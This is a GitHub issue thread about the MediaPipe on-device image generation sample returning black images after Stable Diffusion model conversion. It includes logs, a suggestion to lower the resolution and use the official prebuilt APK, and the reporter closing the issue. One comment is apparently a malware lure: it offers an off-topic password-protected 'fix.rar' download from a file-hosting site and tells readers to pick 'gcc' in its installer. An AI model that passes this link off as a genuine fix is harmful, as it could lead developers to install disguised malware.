### ISSUE TITLE
Image Generation Sample Produces 512x512 black image

### ISSUE THREAD

**Issue by probable1333** [google-ai-edge/mediapipe-samples#435]
**Device:** Galaxy S24+ Exynos 2400
**Models tried:** runwayml/stable-diffusion-v1-5 and hakurei/waifu-diffusion-v1-4 both converted on Google Colab by following the tutorial and tried to generate images with the demo code in this repo.
I am unsure if it is relevant, but the conversion script gave the following warning:
/content/convert.py:42: RuntimeWarning: overflow encountered in cast
  v.numpy().astype("float16").tofile(output_bin_file)

I have added the relevant logs and screenshot as attachments. Thank you.
![img](https://github.com/user-attachments/assets/21fad15c-7410-4ed7-afec-33adc6ba41ea)

[logcat.txt](https://github.com/user-attachments/files/16751716/logcat.txt)

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sl33pyC01E** [comment]
Hi hi, I am not a dev but I'm working on the same sample as you. I have a OnePlus12 with Snapdragon8gen2 and 16GB ram. Using the default settings causes my app to crash on "initialize" due to a memory overflow in the GPU.

I would suggest dropping your resolution to 448x448 (512-64=448)
additionally, here is the prebuilt apk that's available:
https://storage.googleapis.com/mediapipe-tasks/image_generator/imagegenerator.apk


I can't figure out how to avoid the memory overflow on my phone but the prebuilt works at low resolutions.

**Comment by probable1333** [comment]
Closing due to [https://github.com/google-ai-edge/mediapipe/issues/5589](#5589)
